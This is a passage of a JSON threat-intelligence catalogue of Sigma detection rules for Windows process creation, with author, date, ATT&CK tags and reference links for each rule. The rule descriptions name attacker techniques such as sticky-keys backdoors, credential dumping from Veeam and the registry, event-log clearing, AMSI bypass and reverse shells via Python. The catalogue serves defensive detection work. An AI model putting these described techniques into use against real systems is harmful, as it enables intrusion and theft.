"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "value": "Uncommon Svchost Parent Process" }, { "description": "Use of reg to get MachineGuid information", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_machineguid.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_machineguid.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", "value": "Suspicious Query of MachineGUID" }, { "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", "meta": { "author": "Sreeman", "creation_date": "2020-02-18", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_cmd_sticky_keys_replace.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", "https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors", "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml" ], "tags": [ "attack.t1546.008", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "value": "Persistence Via Sticky Key Backdoor" }, { "description": "Detects dump of credentials in VeeamBackup dbo", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" ], "tags": [ "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", "value": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE" }, { "description": "Detects potentially suspicious child processes of \"GoogleUpdate.exe\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_googleupdate_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_googleupdate_susp_child_process.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "84b1ecf9-6eff-4004-bafb-bae5c0e251b2", "value": "Potentially Suspicious GoogleUpdate Child Process" }, { "description": "Detects usage of winget to add new potentially suspicious download sources", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_winget_add_susp_custom_source.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "value": "Add Potential Suspicious New Download Source To Winget" }, { "description": "Detects the clearing or configuration tampering of EventLog using utilities such as \"wevtutil\", \"powershell\" and \"wmic\".\nThis technique were seen used by threat actors and ransomware strains in order to evade defenses.\n", "meta": { "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "creation_date": "2019-09-26", "falsepositive": [ "Admin activity", "Scripts and administrative tools used in the monitored environment", "Maintenance activity" ], "filename": "proc_creation_win_susp_eventlog_clear.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.001", "attack.t1562.002", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", "value": "Suspicious Eventlog Clearing or Configuration Change Activity" }, { "description": "Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands\n", "meta": { "author": "Cian Heasley, Florian Roth (Nextron Systems)", "creation_date": "2020-07-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_webshell_tool_recon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_tool_recon.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677", "value": "Webshell Tool Reconnaissance Activity" }, { "description": "Detects scheduled task creations that have suspicious action command and folder combinations", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_folder_combos.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_folder_combos.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "value": "Schtasks From Suspicious Folders" }, { "description": "Detects execution of \"rundll32\" calling \"advpack.dll\" with potential obfuscated ordinal calls in order to leverage the \"RegisterOCX\" function", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Hexacorn/status/1224848930795552769", "http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "a1473adb-5338-4a20-b4c3-126763e2d3d3", "value": "Suspicious Advpack Call Via Rundll32.EXE" }, { "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_quarks_pwdump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", "https://github.com/quarkslab/quarkspwdump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0685b176-c816-4837-8e7b-1216f346636b", "value": "HackTool - Quarks PwDump Execution" }, { "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", "meta": { "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "creation_date": "2022-05-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_invoke.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", "value": "PowerShell Base64 Encoded Invoke Keyword" }, { "description": "Detects execution of findstr with the \"s\" and \"i\" flags for a \"subfolder\" and \"insensitive\" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.\n", "meta": { "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-05", "falsepositive": [ "Administrative or software activity" ], "filename": "proc_creation_win_findstr_subfolder_search.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_subfolder_search.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1564.004", "attack.t1552.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "04936b66-3915-43ad-a8e5-809eadfd1141", "value": "Insensitive Subfolder Search Via Findstr.EXE" }, { "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" ], "tags": [ "attack.credential-access", "attack.t1552.002" ] }, "related": [ { "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", "value": "Enumeration for Credentials in Registry" }, { "description": "Detects execution of the \"finger.exe\" utility.\nFinger.EXE or \"TCPIP Finger Command\" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.\nDue to the old nature of this utility and the rareness of machines having the finger service. Any execution of \"finger.exe\" can be considered \"suspicious\" and worth investigating.\n", "meta": { "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "creation_date": "2021-02-24", "falsepositive": [ "Admin activity (unclear what they do nowadays with finger.exe)" ], "filename": "proc_creation_win_finger_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_finger_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", "value": "Finger.EXE Execution" }, { "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Legitimate usage of the script by a developer" ], "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1535981653239255040", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216.001" ] }, "related": [ { "dest-uuid": "09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", "value": "Launch-VsDevShell.PS1 Proxy Execution" }, { "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_csexec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/malcomvetter/CSExec", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_csexec.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001", "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "value": "PUA - CsExec Execution" }, { "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", "meta": { "author": "Markus Neis, @Kostastsale", "creation_date": "2018-08-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", "https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", "value": "Potential AMSI Bypass Via .NET Reflection" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", "value": "Invoke-Obfuscation VAR+ Launcher" }, { "description": "Detects execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.\nAttackers could instantiate an instance of \"wusa.exe\" in order to bypass User Account Control (UAC). They can duplicate the access token from \"wusa.exe\" to gain elevated privileges.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wusa_susp_parent_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_parent_execution.yml" ], "tags": [ "attack.execution" ] }, "uuid": "ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99", "value": "Wusa.EXE Executed By Parent Process Located In Suspicious Location" }, { "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-18", "falsepositive": [ "Legitimate administrative use (Should be investigated either way)" ], "filename": "proc_creation_win_pua_cleanwipe.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_cleanwipe.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100", "value": "PUA - CleanWipe Execution" }, { "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-04", "falsepositive": [ "Legitimate use of one of these tools" ], "filename": "proc_creation_win_hktl_execution_via_imphashes.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml" ], "tags": [ "attack.credential-access", "attack.t1588.002", "attack.t1003" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "value": "Hacktool Execution - Imphash" }, { "description": "Detects usage of the Sharp Chisel via the commandline arguments", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_sharp_chisel.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/shantanu561993/SharpChisel", "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_chisel.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.001" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "value": "HackTool - SharpChisel Execution" }, { "description": "Detects the execution of CSharp interactive console by PowerShell", "meta": { "author": "Michael R. (@nahamike01)", "creation_date": "2020-03-08", "falsepositive": [ "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "filename": "proc_creation_win_csi_use_of_csharp_console.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml" ], "tags": [ "attack.execution", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "value": "Suspicious Use of CSharp Interactive Console" }, { "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-27", "falsepositive": [ "Possible but rare" ], "filename": "proc_creation_win_rundll32_no_params.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ber_m1ng/status/1397948048135778309", "https://www.cobaltstrike.com/help-opsec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_no_params.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", "value": "Rundll32 Execution Without CommandLine Parameters" }, { "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", "meta": { "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "creation_date": "2022-08-04", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_iis_susp_module_registration.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_susp_module_registration.yml" ], "tags": [ "attack.persistence", "attack.t1505.004" ] }, "related": [ { "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", "value": "Suspicious IIS Module Registration" }, { "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.\n", "meta": { "author": "Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_addinutil_uncommon_cmdline.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f2cd9b6-4a17-440f-bb2a-687abb65993a", "value": "Uncommon AddinUtil.EXE CommandLine Execution" }, { "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_sdset_modification.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://twitter.com/0gtweet/status/1628720819537936386", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98c5aeef-32d5-492f-b174-64a691896d25", "value": "Service Security Descriptor Tampering Via Sc.EXE" }, { "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-02", "falsepositive": [ "Python libraries that use a flag starting with \"-c\". Filter according to your environment" ], "filename": "proc_creation_win_python_inline_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://docs.python.org/3/using/cmdline.html#cmdoption-c", "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "899133d5-4d7c-4a7f-94ee-27355c879d90", "value": "Python Inline Command Execution" }, { "description": "Detects the execution of a system command via the ScreenConnect RMM service.", "meta": { "author": "Ali Alwashali", "creation_date": "2023-10-10", "falsepositive": [ "Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used." ], "filename": "proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/pull/4467", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1f73849-6329-4069-bc8f-78a604bb8b23", "value": "Remote Access Tool - ScreenConnect Remote Command Execution" }, { "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-02", "falsepositive": [ "Unknown" ], "filename": 